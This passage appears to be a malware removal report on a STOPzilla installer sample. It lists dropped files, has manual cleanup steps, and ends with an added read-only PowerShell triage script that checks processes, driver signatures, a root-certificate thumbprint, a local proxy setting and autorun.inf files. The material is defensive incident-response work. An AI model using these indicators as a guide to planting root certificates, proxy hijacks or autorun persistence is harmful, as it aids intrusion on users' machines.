%Program Files% (x86)\STOPzilla\Definitions\LKGD\RegDT.vdx (74330 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\cname.wtd (6010 bytes)
%Program Files% (x86)\STOPzilla\Definitions\JSSigs.vdx (8281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libEmail.dll (14250 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\lib7zip.dll (4425 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\VVSSigs.vdx (36 bytes)
%Program Files% (x86)\STOPzilla\Definitions\gfiark.dll (29 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\FastSigs.vdx (14250 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libVvs.dll (2105 bytes)
%Program Files% (x86)\STOPzilla\Definitions\qscnf.vdx (541 bytes)
%Program Files% (x86)\STOPzilla\Definitions\RegDT.vdx (7433 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libEmail.dll (6505 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\pack0.std (14 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\RTA84430 (5516 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\kbu.dat (86490 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\SBBIN.RTP (405 bytes)
%Program Files% (x86)\STOPzilla\Definitions\bmem.vtd (708 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\FolderDT.vdx (6010 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libBase64.dll (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\apprules.dat (10 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\lgpl.dll (73450 bytes)
%Program Files% (x86)\STOPzilla\Definitions\hcol.wtd (50 bytes)
%Program Files% (x86)\STOPzilla\Definitions\dnrlmem.vtd (554 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\cname.wtd (905 bytes)
%Program Files% (x86)\STOPzilla\Definitions\dexmem.vtd (348 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\gfiutl64.sys (31 bytes)
%Program Files% (x86)\STOPzilla\Definitions\sel.dat (6 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\qscnf.vdx (5410 bytes)
%Program Files% (x86)\STOPzilla\SBAMConfig.bin (20 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\ctid.vtd (2001852 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\JSSigs.vdx (1 bytes)
C:\ProgramData\STOPzilla!\HIPSConfig.xml (3056 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiutl32.sys (240 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\DefVer.txt (260 bytes)
%Program Files% (x86)\STOPzilla\Definitions\qscnr.vdx (8 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libMsCab.dll (2321 bytes)
%Program Files% (x86)\STOPzilla\Definitions\WebFilterExceptions.dat (184 bytes)
%Program Files% (x86)\STOPzilla\Definitions\patchw32.dll (1514 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\white.wtd (3903230 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\defs0.std (50348 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\vcore.dll (395060 bytes)
%Program Files% (x86)\STOPzilla\Definitions\vcore.dll (40233 bytes)
%Program Files% (x86)\STOPzilla\Definitions\VVSSigs.vdx (36 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libRar.dll (14250 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiark64.sys (410 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\ih.vdx (14250 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\script0.std (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\ThreatCategoryGlossary.xml (470 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\JSSigs.vdx (82810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\gfiark32.sys (823 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libMsCab.dll (23210 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\idsrules.dat (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\FileDT.vdx (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\comp0.std (430 bytes)
%Program Files% (x86)\STOPzilla\Definitions\IncompatiblePrograms.dll (601 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\dex_hash.dat (1327060 bytes)
%Program Files% (x86)\STOPzilla\gfiark64.sys (86 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libRTF.dll (1761 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\Cookies.vdx (12810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\updater.dll (6730 bytes)
C:\ProgramData\STOPzilla!\APConfig.xml (592 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\acertdefs0.std (477 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\RootCA.wtd (340 bytes)
%Program Files% (x86)\STOPzilla\Definitions\rem0.std (9605 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\pack0.std (140 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libMsi.dll (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\white.wtd (492846 bytes)
%Program Files% (x86)\STOPzilla\Definitions\gfiutl64.sys (31 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\hcol.wtd (500 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\kbu.dll (450 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\idsrules.dat (136 bytes)
C:\ProgramData\STOPzilla!\HttpServerConfig.xml (624 bytes)
%Program Files% (x86)\STOPzilla\Definitions\gfiarkup.dll (601 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libRTF.dll (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libVvs.dll (21050 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\RootCA.wtd (34 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ThreatCategoryGlossary.xml (47 bytes)
%Program Files% (x86)\STOPzilla\Definitions\RootCA.wtd (34 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\apincl.dat (714 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\ThreatID.vdx (8632 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\white0.std (150 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ckmem.vdx (412 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\defs0.std (852280 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\HistoryCleaner.xml (6730 bytes)
%Program Files% (x86)\STOPzilla\SbHips.dll (90 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\kbu.dll (620 bytes)
C:\ProgramData\STOPzilla!\CountScans.XML (338 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\AdviceTx.vdx (100 bytes)
%Program Files% (x86)\STOPzilla\gfiutil.dll (30 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\ThreatCategoryGlossary.xml (47 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\fsigs.vdx (192 bytes)
%Program Files% (x86)\STOPzilla\Definitions\apprules.dat (1 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\rem0.std (57449 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\sel.dat (6 bytes)
C:\ProgramData\STOPzilla!\Logs\SBAMThreatEngineLog.csv (1134046 bytes)
C:\Windows\System32\drivers\gfiutil.sys (63 bytes)
%Program Files% (x86)\STOPzilla\Definitions\cblk.vtd (998680 bytes)
%Program Files% (x86)\STOPzilla\Definitions\comp0.std (43 bytes)
%Program Files% (x86)\STOPzilla\kbu.dll (127 bytes)
%Program Files% (x86)\STOPzilla\FSSC.dat (12 bytes)
%Program Files% (x86)\STOPzilla\Definitions\CatID.vdx (9 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\kbu.dat (842160 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libMachoUniv.dll (6730 bytes)
C:\ProgramData\STOPzilla!\WSCConfig.xml (1330 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\gfiutil.dll (14 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libtd.dll (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\lib7zip.dll (6730 bytes)
C:\ProgramData\STOPzilla!\Events\EV2015042504171201.xml (370 bytes)
%Program Files% (x86)\STOPzilla\Definitions\gfiark64.sys (41 bytes)
C:\ProgramData\STOPzilla!\Events\EV2015042504202902.xml (370 bytes)
%Program Files% (x86)\STOPzilla\gfiutl32.sys (24 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\heur0.std (2 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiutil.dll (140 bytes)
%Program Files% (x86)\STOPzilla\Definitions\sdll0.std (22336 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiark.dll (290 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libRar.dll (1425 bytes)
%Program Files% (x86)\STOPzilla\Definitions\lib7zip.dll (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\gfiark32.sys (43 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\ThreatCategoryGlossary.xsd (10 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ThreatID.vdx (8281 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ip.vtd (824 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ThreatDT.vdx (54589 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\bhsl.vtd (40124 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\gfiark32.sys (430 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\api0.std (30730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\unpck0.std (55 bytes)
%Program Files% (x86)\STOPzilla\Definitions\libCHM.dll (673 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\sel.dat (60 bytes)
%Program Files% (x86)\STOPzilla\Definitions\defs0.std (85228 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\script0.std (5374 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\ctid.vtd (3413080 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\vcore.dll (76554 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\macroptn.std (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\rem0.std (96050 bytes)
%Program Files% (x86)\STOPzilla\Definitions\apincl.dat (714 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\apprules.dat (1 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\libMsi.dll (3761 bytes)
C:\ProgramData\STOPzilla!\EmailAVConfig.xml (205 bytes)
%Program Files% (x86)\STOPzilla\Definitions\incompats.dat (1 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\CatDesc.vdx (180 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\white0.std (15 bytes)
C:\ProgramData\STOPzilla!\ScanConfig.xml (2932 bytes)
%Program Files% (x86)\STOPzilla\SBTIS.dll (114 bytes)
%Program Files% (x86)\STOPzilla\Definitions\white.wtd (390323 bytes)
%Program Files% (x86)\STOPzilla\Definitions\acertdefs0.std (477 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\Cookies.vdx (3097 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\CoreVer.txt (30 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\cblk.vtd (9985728 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\fsigs.vdx (1920 bytes)
%Program Files% (x86)\STOPzilla\Definitions\adsrules.dat (1425 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\unpck0.std (550 bytes)
%Program Files% (x86)\STOPzilla\Definitions\FolderDT.vdx (601 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\libBase64.dll (6730 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\ThreatID.vdx (82810 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\FastSigs.vdx (280 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\HistoryCleaner.xml (5951 bytes)
C:\ProgramData\STOPzilla!\Logs\SBAMSvcLog.csv (1383028 bytes)
%Program Files% (x86)\STOPzilla\Definitions\ctid.vtd (341308 bytes)
%Program Files% (x86)\STOPzilla\Definitions\cname.wtd (601 bytes)
%Program Files% (x86)\STOPzilla\Definitions\Staging\elf_hash.dat (528 bytes)
%Program Files% (x86)\STOPzilla\Definitions\LKGD\qscnr.vdx (80 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\TarF5E3.tmp (2712 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A4B782275DC1682E4DC39E697A49B151 (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 (656 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\CabF5E2.tmp (48 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\STOPzilla7.msi (1643823 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A4B782275DC1682E4DC39E697A49B151 (412 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl (712 bytes)
%Program Files% (x86)\STOPzilla\SBSetupDrivers.exe (180 bytes)
C:\Windows\System32\DriverStore\Temp\{4f69f560-3dc5-07a7-53cf-bd6e4eaaf72f}\SETDC0D.tmp (3 bytes)
C:\Windows\System32\DriverStore\Temp\{4f69f560-3dc5-07a7-53cf-bd6e4eaaf72f}\SETDBFC.tmp (8 bytes)
C:\Windows\System32\DriverStore\INFCACHE.0 (1861 bytes)
C:\Windows\System32\DriverStore\infstor.dat (940 bytes)
C:\Windows\inf\oem13.inf (3 bytes)
C:\Windows\System32\DriverStore\Temp\{4f69f560-3dc5-07a7-53cf-bd6e4eaaf72f}\amd64\wnet\SETDC0E.tmp (601 bytes)
C:\Windows\System32\DriverStore\FileRepository\sbfwim.inf_amd64_neutral_09abe461a7fb864d\sbfwim.PNF (8464 bytes)
C:\Windows\System32\DriverStore\Temp\{43a08643-c069-7a03-1bae-01365fc66a22}\SETDDE0.tmp (8 bytes)
C:\Windows\inf\oem14.inf (1 bytes)
C:\Windows\System32\DriverStore\Temp\{43a08643-c069-7a03-1bae-01365fc66a22}\SETDDF0.tmp (1 bytes)
C:\Windows\System32\DriverStore\FileRepository\sbfwim_m.inf_amd64_neutral_9058dec7bb12b258\sbfwim_m.PNF (4811 bytes)
C:\ProgramData\STOPzilla!\Logs\S-1-5-21-2858020935-2156992550-3658131804-1003.stopzilla7.log (24142 bytes)
C:\ProgramData\STOPzilla!\sz7.data-journal (4518 bytes)
C:\Windows\Temp\OLD168C.tmp (601 bytes)
C:\Windows\System32\drivers\SET169B.tmp (691 bytes)
%Program Files% (x86)\STOPzilla\x64\SBAMSvcPS.dll (69 bytes)
%Program Files% (x86)\STOPzilla\x64\SBAMOutlook.dll (446 bytes)
C:\Windows\Temp\cfc791fe-c515-4b74-a3d5-bd35083fed43 (223 bytes)
C:\Windows\Temp\b547cdad-d8a5-4d61-95a2-f7616170c67e (223 bytes)
C:\Windows\Temp\ae0b2b8c-b2b5-4e50-b7ff-769522044179 (223 bytes)
C:\ProgramData\STOPzilla!\Logs\sz-net-assist.log (19768668 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A4B782275DC1682E4DC39E697A49B151 (1 bytes)
C:\Windows\Temp\fff275e4-419b-48fe-963a-c0011a05bfb9 (48733 bytes)
C:\Windows\Temp\037d4f6a-0574-4316-b003-d803b0bc2577 (24945 bytes)
C:\Windows\Temp\4c7c3001-c7cf-4f43-88e1-0f52a08e06a9 (223 bytes)
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A4B782275DC1682E4DC39E697A49B151 (412 bytes)
C:\Windows\Temp\59db4a19-a509-4b93-b854-13678662fd8f (10071 bytes)
C:\Windows\Temp\bbe27e88-1190-4118-a730-4f9519d6c74d (30169149 bytes)
C:\Windows\Temp\7f53ae67-47b8-4bf2-aad3-054d5e7e2bf1 (223 bytes)
C:\Windows\Temp\73901abc-e30f-42ed-898e-68cb9217849e (223 bytes)
C:\ProgramData\STOPzilla!\Logs\sz7.log (78551 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\etilqs_o4arGwZ2LOh436Q (80 bytes)
C:\Windows\SysWOW64\msvcr120.dll (974 bytes)
C:\ProgramData\STOPzilla!\Logs\sz7-msi.log (18618 bytes)
%Program Files% (x86)\STOPzilla\GFI.Tools.Run64.exe (192 bytes)
C:\Windows\SysWOW64\msvcp120.dll (458 bytes)
C:\ProgramData\STOPzilla!\Logs\wsc.log (6794 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI16DA.tmp (159 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"GrpConv" = "grpconv -o"
This RunOnce entry is written by Windows Installer after an MSI installation and runs Windows' own grpconv.exe; removing it is harmless, but it is not how the sample persists.
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
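The manual steps above collected into a read-only triage script, so that each indicator is verified on the host before anything is terminated or deleted. This is an added example, not part of the Lavasoft report or of STOPzilla's own software. It assumes PowerShell 3 or later in an elevated prompt, that the report's "%Program Files% (x86)" placeholder is the live ${env:ProgramFiles(x86)} directory, and it checks only the drivers and service binaries from the file list, not the definition data; the generic Windows binaries in the process list are skipped on purpose.

```powershell
# Added triage script for the indicators in the report above. It is not part of the
# Lavasoft report or of STOPzilla; run it from an elevated PowerShell prompt on the
# suspect host. It only reads and prints, it does not terminate or delete anything.
# Assumption: the report's "%Program Files% (x86)" placeholder is the live
# ${env:ProgramFiles(x86)} directory.

$ErrorActionPreference = 'SilentlyContinue'

# Image names from the "Terminate malicious process(es)" list. The generic Windows
# binaries in that list (runonce, DrvInst, RUNDLL32, regsvr32, mobsync, MsiExec)
# are left out on purpose: matching them by name alone would flag normal activity.
$procNames = 'SBSetupDrivers', 'GFI.Tools.Run64', 'STOPzilla',
             'SZNetAssistant', 'SZServer', 'SZWSC'

# Drivers and service binaries from the dropped-file list (a subset; the rest is
# definition data under %Program Files% (x86)\STOPzilla\Definitions).
$pf86  = ${env:ProgramFiles(x86)}
$files = @(
  "$env:SystemRoot\System32\drivers\sbwtis.sys",
  "$env:SystemRoot\System32\drivers\sbhips.sys",
  "$env:SystemRoot\System32\drivers\sbapifs.sys",
  "$env:SystemRoot\System32\drivers\SbFw.sys",
  "$env:SystemRoot\System32\drivers\SbFwIm.sys",
  "$env:SystemRoot\System32\drivers\gfiark.sys",
  "$env:SystemRoot\System32\drivers\gfiutil.sys",
  "$pf86\STOPzilla\SBSetupDrivers.exe",
  "$pf86\STOPzilla\GFI.Tools.Run64.exe",
  "$pf86\STOPzilla\x64\SBAMSvcPS.dll"
)

# Root-store thumbprint and WinINET proxy string seen among the memory strings
$certThumb = 'C864484869D41D2B0D32319C5A62F9315AAF2CBD'
$proxyIoc  = '127.0.0.1:5555'

Write-Host '== Listed processes currently running =='
Get-Process | Where-Object { $procNames -contains $_.Name } |
  Select-Object Name, Id, Path | Format-Table -AutoSize

Write-Host '== Listed files present on disk, with Authenticode status =='
$files | Where-Object { Test-Path -LiteralPath $_ } | ForEach-Object {
  $sig = Get-AuthenticodeSignature -FilePath $_
  [pscustomobject]@{
    Path   = $_
    Status = $sig.Status                      # Valid, NotSigned, HashMismatch, ...
    Signer = $sig.SignerCertificate.Subject
  }
} | Format-Table -AutoSize

Write-Host '== RunOnce value named in the report =='
(Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce').GrpConv

Write-Host '== Machine root store entry for the listed thumbprint =='
Get-ChildItem Cert:\LocalMachine\Root |
  Where-Object { $_.Thumbprint -eq $certThumb } |
  Select-Object Subject, NotAfter, Thumbprint

Write-Host '== Per-user WinINET proxy pointing at the listed local port =='
$inet = Get-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings'
if ($inet.ProxyServer -like "*$proxyIoc*") {
  "ProxyEnable=$($inet.ProxyEnable) ProxyServer=$($inet.ProxyServer)"
}

Write-Host '== autorun.inf on removable drives (WormAutorun behaviour) =='
Get-CimInstance Win32_LogicalDisk -Filter 'DriveType = 2' | ForEach-Object {
  $inf = "$($_.DeviceID)\autorun.inf"
  if (Test-Path -LiteralPath $inf) {
    Write-Host $inf
    Get-Content -LiteralPath $inf -Force    # -Force also reads hidden/system files
  }
}
```

Read the Authenticode column before deleting anything: the paths in the report form a STOPzilla installation (the sample's company field is iS3, Inc.), so a file that verifies with a valid signature from that vendor is part of that product rather than a disguised payload, while an unsigned or hash-mismatched driver under System32\drivers is the one to preserve for analysis and then remove.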